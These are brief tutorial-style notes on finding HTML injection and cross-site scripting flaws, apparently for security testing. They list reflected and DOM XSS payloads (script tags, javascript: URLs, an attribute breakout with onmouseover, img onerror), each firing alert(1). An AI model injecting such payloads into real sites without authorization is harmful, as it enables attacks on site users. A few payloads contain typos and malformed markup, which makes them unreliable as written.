How to Test
- If you see a parameter. You could input
jaykumar123and look in the source where you find this string. - If it in
<p>or similar tag start with adding basic html
"><u>jaykumar123
- If you see now the text underlined you can render html so there is html injection then we can try
"><u>jaykumar123<script>alert(1)</script>
Instead of Url you can try this
name=<a href=javascript:alert(1)>test123
name=<iframe src=javascirpt:alert(1)>
name=<object data="data:text/html,<script>alert(1)</script>"</object>
- In input value tag (You look in source and add ” as required)
name=udemy123" onmouseover=alert(1);//
- In text area
- Always look at the context in the dev tools.
Dom
#<img src=x onerror=alert(1)>